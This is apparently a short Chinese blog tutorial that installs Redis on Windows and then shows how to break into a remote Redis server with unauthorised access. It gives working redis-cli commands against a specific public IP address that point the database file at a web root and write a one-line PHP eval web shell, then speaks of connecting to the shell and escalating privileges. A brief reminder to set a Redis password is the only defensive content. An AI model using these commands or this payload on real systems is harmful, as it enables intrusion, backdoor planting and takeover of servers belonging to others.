redis安装:
windows安装包:http://pan.baidu.com/s/1i3jLlC5
下载下来之后,开始安装:
redis-server.exe redis.conf:
简单一步,安装成功,保持这个windows持续运行~
查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~
接下来,开始利用redis-cli.exe来进行远程redis的入侵:
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:
开启redis客户端
输入以下命令来连接远程redis
redis-cli -h 125.39.185.150 -p 6379
接下来,在远程redis内存中设置数据:
config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)
config set dbfilename test.php(在内存中的/var/www/html目录下建立一个test.php文件)
set xiaoma "<?php @eval($_POST[mi]);?>"(设置key-value,此时该值在Memory中)
save (将Memory中的key-value保存到硬盘,并保存为test.php文件)
四个OK就搞定了~
此时,就可以直接连shell,开始提权了~
redis入侵参考:
http://www.wooyun.org/bugs/wooyun-2015-0101465
http://www.wooyun.org/bugs/wooyun-2010-0105096